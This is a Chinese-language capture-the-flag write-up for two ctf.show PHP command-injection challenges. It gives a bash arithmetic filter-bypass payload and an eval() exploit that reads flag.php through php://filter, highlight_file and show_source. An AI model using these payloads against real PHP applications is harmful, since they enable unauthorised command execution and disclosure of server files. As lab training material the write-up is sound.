Web57
源代码:
//flag in 36.php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
system("cat ".$c.".php");
}
}else{
highlight_file(__FILE__);
}代码审计:
过滤了数字和字母,以及一些符号。
没有过滤 $和括号()
思路:
使用$(())进行取反运算,得到数字36.
双小括号(())是bash shell中用于进行整数运算的命令。
在前面加上美元符号$来获取命令的运算结果。
$(())的值是0,因为双括号中没有值。
进行取反运算$(( ~$(()) )),该式值为-1.
由于36的反码是-37,所以我们对-37取反,就能得到36
取反运算是这样的:
$(( ~$(([运算内容])) ))我们在运算内容出填入37个$(( ~$(()) )),也就是-37,就能算出36
构造用脚本:
target = "$((~$(({}))))"
content = "$((~$(())))"
print(target.format(content*37))EXP:
payload:
https://41f9be69-4d07-476e-a03b-d13adf528033.challenge.ctf.show/
?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))得到flag.
Web58
源代码:
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);代码审计:
POST传参c,执行系统命令。
思路:
一眼看上去很简单,直接POST传入命令执行函数,结果报错:
system() has been disabled for security reasons
system()出于安全原因已被禁用。说明管理员在php配置文件中禁用了该命令执行函数。
使用其他命令函数也显示被禁用。
不能使用命令函数,我们考虑使用包含函数include与php伪协议。
EXP:
先扫描目录下的文件:
c=print_r(scandir(dirname('FILE')));dirname('FILE')取得当前文件所在的目录
scandir作用是读取指定目录下的所有文件和子目录,并返回包含这些文件和子目录的数组。
发现有flag.php
c=include($_POST[1]);&1=php://filter/convert.base64-encode/resource=flag.php得到flag.php文件base64编码后的内容,解码即可获得flag.
拓展:
也可以使用highlight_file显示文件内容:
c=highlight_file("flag.php");或者使用show_source函数,效果也是显示源代码:
c=show_source('flag.php');